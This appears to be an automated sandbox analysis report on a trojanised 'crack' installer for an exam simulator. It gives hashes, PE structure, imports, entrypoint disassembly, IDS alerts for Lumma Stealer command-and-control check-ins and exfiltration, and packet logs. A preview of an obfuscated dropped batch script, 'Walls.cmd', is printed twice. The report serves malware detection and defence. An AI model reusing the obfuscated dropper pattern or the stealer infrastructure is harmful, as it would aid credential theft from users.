                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:fP9FyITULSw84b1q3+NcMR6HtDk6293d5r2TMIj+Reu4ZMr7RGCV5let041+2NXD:X3y02+4b1o+XR6P293L2TGeu4ZaNGyUT
                                                                                                            MD5:A42926576F58EDA76BDDFFBF3FBE8C35
                                                                                                            SHA1:CB044681CE87642A815F6F0A11D659E56944F13C
                                                                                                            SHA-256:B06C7469D3B0D058F7216B9FCD71C07481358CE855A0D542C378E3DF537064E4
                                                                                                            SHA-512:934EEC9D6E3134BF7EF1938DAF588CE5C136347855D7C75F75C17C2B299DA6559D267A6F71807F83054E2CBE8D2A186600221B2576CE108E4507E895676B6D61
                                                                                                            Malicious:false
                                                                                                            Preview:Set Sip=e..TPTry-Continually-Searching-..kcDriver-Raises-Hardcover-Shall-Massachusetts-Newton-..fCOmNewport-Nil-Angels-Edges-Av-Built-Enable-Dates-Ports-..skNaughty-Settings-Ent-..gRWuTitles-Online-..tqYLogan-..EJXProgram-Terminals-..Set Transcripts=m..tqHonor-How-..sSDiameter-Worked-Bigger-Raising-Spain-Madness-Ide-Prix-Thumbzilla-..dlRm-Rank-..hARArray-Captured-Cross-Lebanon-Pools-Dome-Nomination-Festival-..vJeFGenre-Assured-Workout-Got-Compete-Rely-Titled-Dui-Stationery-..DXUhSymantec-Clips-Lord-Kitchen-Aluminum-..uNEeTwisted-Bind-Adoption-Intellectual-Hunger-Disc-..hxISustainability-Excerpt-Bigger-Tribute-Rpg-Ecommerce-..WLzSupplied-Shake-Done-Challenging-..EZhGuinea-Findarticles-Ons-..Set Choir=G..XZyvGrows-Ct-Scoop-Manage-Truly-Ordinance-..KCszDisclose-Ease-Isle-Mature-Scoring-Cg-Nicaragua-Uzbekistan-Exchanges-..RVRivers-Syntax-Lips-Worst-Recent-Acoustic-..yOrQJ-Verbal-Happened-..YJECoins-Forecast-..Set Diverse=W..KcJPackard-Winning-Assembly-Vol-Decades-Mat-Pointed-Encourage-More

                                                                                                            C:\Users\user\AppData\Local\Temp\Walls.cmd (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:ASCII text, with very long lines (873), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20756
                                                                                                            Entropy (8bit):5.105149918773854
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:fP9FyITULSw84b1q3+NcMR6HtDk6293d5r2TMIj+Reu4ZMr7RGCV5let041+2NXD:X3y02+4b1o+XR6P293L2TGeu4ZaNGyUT
                                                                                                            MD5:A42926576F58EDA76BDDFFBF3FBE8C35
                                                                                                            SHA1:CB044681CE87642A815F6F0A11D659E56944F13C
                                                                                                            SHA-256:B06C7469D3B0D058F7216B9FCD71C07481358CE855A0D542C378E3DF537064E4
                                                                                                            SHA-512:934EEC9D6E3134BF7EF1938DAF588CE5C136347855D7C75F75C17C2B299DA6559D267A6F71807F83054E2CBE8D2A186600221B2576CE108E4507E895676B6D61
                                                                                                            Malicious:false
                                                                                                            Preview:Set Sip=e..TPTry-Continually-Searching-..kcDriver-Raises-Hardcover-Shall-Massachusetts-Newton-..fCOmNewport-Nil-Angels-Edges-Av-Built-Enable-Dates-Ports-..skNaughty-Settings-Ent-..gRWuTitles-Online-..tqYLogan-..EJXProgram-Terminals-..Set Transcripts=m..tqHonor-How-..sSDiameter-Worked-Bigger-Raising-Spain-Madness-Ide-Prix-Thumbzilla-..dlRm-Rank-..hARArray-Captured-Cross-Lebanon-Pools-Dome-Nomination-Festival-..vJeFGenre-Assured-Workout-Got-Compete-Rely-Titled-Dui-Stationery-..DXUhSymantec-Clips-Lord-Kitchen-Aluminum-..uNEeTwisted-Bind-Adoption-Intellectual-Hunger-Disc-..hxISustainability-Excerpt-Bigger-Tribute-Rpg-Ecommerce-..WLzSupplied-Shake-Done-Challenging-..EZhGuinea-Findarticles-Ons-..Set Choir=G..XZyvGrows-Ct-Scoop-Manage-Truly-Ordinance-..KCszDisclose-Ease-Isle-Mature-Scoring-Cg-Nicaragua-Uzbekistan-Exchanges-..RVRivers-Syntax-Lips-Worst-Recent-Acoustic-..yOrQJ-Verbal-Happened-..YJECoins-Forecast-..Set Diverse=W..KcJPackard-Winning-Assembly-Vol-Decades-Mat-Pointed-Encourage-More

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):0.34826564709824204
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.23%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.18%
                                                                                                            • DirectShow filter (201580/2) 0.99%
                                                                                                            • Windows ActiveX control (116523/4) 0.57%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:vce exam simulator 2.2.1 crackk.exe
                                                                                                            File size:927'079'465 bytes
                                                                                                            MD5:636555b743ce6aeb326544eb56e8b5e9
                                                                                                            SHA1:18a672fa6c98b7f54e2c49daf5b33d92925a9ca4
                                                                                                            SHA256:863f990882827996b28b0d7efc6f02c9b734a4ea8f7ef18d777bc8ed8ff214cc
                                                                                                            SHA512:d66993944c37e7e4090ea792477d16657ffcda6ed39c6cf55ac5756d43dc96a9d49b80e318479ec535487a3e81e43481cd90812303f11d4c3bc231b81c978322
                                                                                                            SSDEEP:
                                                                                                            TLSH:
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...X...B...8.....

                                                                                                            File Icon

                                                                                                            Icon Hash:072304c1444c390f

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4038af
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                            Authenticode Signature

                                                                                                            Signature Valid:
                                                                                                            Signature Issuer:
                                                                                                            Signature Validation Error:
                                                                                                            Error Number:
                                                                                                            Not Before, Not After
                                                                                                              Subject Chain
                                                                                                                Version:
                                                                                                                Thumbprint MD5:
                                                                                                                Thumbprint SHA-1:
                                                                                                                Thumbprint SHA-256:
                                                                                                                Serial:

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                sub esp, 000002D4h
                                                                                                                push ebx
                                                                                                                push ebp
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                push 00000020h
                                                                                                                xor ebp, ebp
                                                                                                                pop esi
                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                mov dword ptr [esp+10h], 0040A268h
                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                call dword ptr [00409030h]
                                                                                                                push 00008001h
                                                                                                                call dword ptr [004090B4h]
                                                                                                                push ebp
                                                                                                                call dword ptr [004092C0h]
                                                                                                                push 00000008h
                                                                                                                mov dword ptr [0047EB98h], eax
                                                                                                                call 00007F8D8C6DA85Bh
                                                                                                                push ebp
                                                                                                                push 000002B4h
                                                                                                                mov dword ptr [0047EAB0h], eax
                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                push eax
                                                                                                                push ebp
                                                                                                                push 0040A264h
                                                                                                                call dword ptr [00409184h]
                                                                                                                push 0040A24Ch
                                                                                                                push 00476AA0h
                                                                                                                call 00007F8D8C6DA53Dh
                                                                                                                call dword ptr [004090B0h]
                                                                                                                push eax
                                                                                                                mov edi, 004CF0A0h
                                                                                                                push edi
                                                                                                                call 00007F8D8C6DA52Bh
                                                                                                                push ebp
                                                                                                                call dword ptr [00409134h]
                                                                                                                cmp word ptr [004CF0A0h], 0022h
                                                                                                                mov dword ptr [0047EAB8h], eax
                                                                                                                mov eax, edi
                                                                                                                jne 00007F8D8C6D7E2Ah
                                                                                                                push 00000022h
                                                                                                                pop esi
                                                                                                                mov eax, 004CF0A2h
                                                                                                                push esi
                                                                                                                push eax
                                                                                                                call 00007F8D8C6DA201h
                                                                                                                push eax
                                                                                                                call dword ptr [00409260h]
                                                                                                                mov esi, eax
                                                                                                                mov dword ptr [esp+1Ch], esi
                                                                                                                jmp 00007F8D8C6D7EB3h
                                                                                                                push 00000020h
                                                                                                                pop ebx
                                                                                                                cmp ax, bx
                                                                                                                jne 00007F8D8C6D7E2Ah
                                                                                                                add esi, 02h
                                                                                                                cmp word ptr [esi], bx

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                • [LNK] VS2010 SP1 build 40219

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x1e68a.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x11e2db0x2e88
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x1000000x1e68a0x1e80087ae4064ad400d6bd4072665936ba491False0.6280657658811475data6.043039947311888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x11f0000xfd60x100079cd0fe30c9b465cc6b756978183fbc8False0.59716796875data5.574303368928403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0x1003540x1c57PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0015161957270848
                                                                                                                RT_ICON0x101fac0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.44365337672904803
                                                                                                                RT_ICON0x1046140x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5068306010928961
                                                                                                                RT_ICON0x10573c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6542553191489362
                                                                                                                RT_ICON0x105ba40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.8395390070921985
                                                                                                                RT_ICON0x10600c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.7399155722326454
                                                                                                                RT_ICON0x1070b40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.687655601659751
                                                                                                                RT_ICON0x10965c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.6650330656589514
                                                                                                                RT_ICON0x10d8840x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.6024636223825861
                                                                                                                RT_DIALOG0x11e0ac0x100dataEnglishUnited States0.5234375
                                                                                                                RT_DIALOG0x11e1ac0x11cdataEnglishUnited States0.6056338028169014
                                                                                                                RT_DIALOG0x11e2c80x60dataEnglishUnited States0.7291666666666666
                                                                                                                RT_GROUP_ICON0x11e3280x4cdata0.8026315789473685
                                                                                                                RT_GROUP_ICON0x11e3740x3edataEnglishUnited States0.8225806451612904
                                                                                                                RT_MANIFEST0x11e3b40x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-24T13:52:40.597951+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:41.425333+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:41.425333+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:42.837509+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:43.719925+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:43.719925+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:45.420635+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:48.910081+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:49.806140+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449739104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:51.213434+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:53.831695+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:56.289015+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.33.227443TCP
                                                                                                                2024-12-24T13:52:56.292468+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449742104.21.33.227443TCP
                                                                                                                2024-12-24T13:53:00.764066+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.33.227443TCP
                                                                                                                2024-12-24T13:53:01.644646+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743104.21.33.227443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 24, 2024 13:52:39.360812902 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:39.360846996 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:39.360918999 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:39.364784956 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:39.364798069 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:40.597748041 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:40.597950935 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:40.601728916 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:40.601742983 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:40.601944923 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:40.641726971 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:40.649590015 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:40.649621010 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:40.649781942 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:41.425291061 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:41.425360918 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:41.425491095 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:41.427495003 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:41.427511930 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:41.427531004 CET49736443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:41.427537918 CET44349736104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:41.433613062 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:41.433675051 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:41.433746099 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:41.434036016 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:41.434056044 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:42.837404966 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:42.837508917 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:42.859625101 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:42.859679937 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:42.859882116 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:42.863373041 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:42.863456011 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:42.863481045 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.719912052 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.719957113 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.719984055 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.720016003 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.720071077 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.720438004 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.728127956 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.736542940 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.736598015 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.736618996 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.744975090 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.745028973 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.745044947 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.753310919 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.753367901 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.753384113 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.797892094 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.839441061 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.891674042 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.911448002 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915509939 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915571928 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915677071 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915677071 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915752888 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915795088 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915823936 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915843010 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:44.010229111 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:44.010262966 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:44.010351896 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:44.010622025 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:44.010632992 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.420326948 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.420634985 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.421864986 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.421875000 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.422072887 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.423441887 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.423599005 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.423629045 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.423688889 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.423696995 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.587636948 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.587743998 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.587796926 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.587882996 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.587897062 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.651568890 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.651627064 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.651715040 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.652141094 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.652162075 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.909998894 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.910080910 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.913604975 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.913645983 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.913872957 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.915858030 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.916023970 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.916069984 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.806121111 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.806195974 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.806317091 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.806432962 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.806478977 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.976619959 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.976664066 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.976749897 CET49740443192.168.2.4104.21.33.227
